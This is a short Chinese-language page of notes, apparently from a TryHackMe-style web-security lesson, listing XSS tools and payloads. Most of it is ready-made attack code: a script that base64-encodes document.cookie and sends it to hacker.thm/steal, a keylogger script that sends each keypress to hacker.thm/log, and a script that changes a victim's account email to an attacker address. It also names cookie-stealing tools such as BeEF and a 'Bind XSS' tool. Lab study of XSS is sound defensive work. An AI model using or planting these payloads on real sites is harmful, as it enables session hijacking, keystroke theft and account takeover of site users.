最后更新于2年前
这有帮助吗?
一个迷你的本地端口扫描器
一个 XSS Payload 网站
BeFF XSS 渗透测试工具
会话窃取
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
按键记录器
记录用户的所有击键
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
逻辑 修改用户邮箱
修改用户邮箱
<script>user.changeEmail('attacker@hacker.thm');</script>
Bind XSS
Bind XSS 攻击工具,自动获取 COOKIE 、URL、页面内容